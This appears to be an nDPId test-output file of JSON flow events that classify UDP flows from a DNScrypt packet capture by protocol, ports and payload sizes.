-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348912,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":41895,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305220,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":53811,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396071,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48300,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400520,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":54920,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337077,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":55768,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305384,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":555,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":57465,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400518,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":56988,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396215,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":36335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305218,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":33369,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":59709,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739391046,"flow_last_seen":946739391308,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":50601,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312407,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":35634,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":40374,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304810,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43365,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305328,"flow_last_seen":946739305354,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":555,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":55482,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400553,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":50757,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312399,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":54112,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337184,"flow_last_seen":946739337214,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":707,"flow_avg_l4_payload_len":353,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":35734,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305326,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":52284,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318175,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":35903,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312179,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":43129,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":34324,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":53887,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305214,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":47865,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337183,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":38508,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":48159,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304397,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":39655,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317461,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":51363,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318170,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":40138,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318168,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":50387,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400553,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":57109,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380983,"flow_last_seen":946739381016,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":50403,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304788,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43609,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318168,"flow_last_seen":946739318202,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":37328,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400519,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":59354,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55409,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337077,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":49975,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348915,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46363,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317493,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":60091,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":57636,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 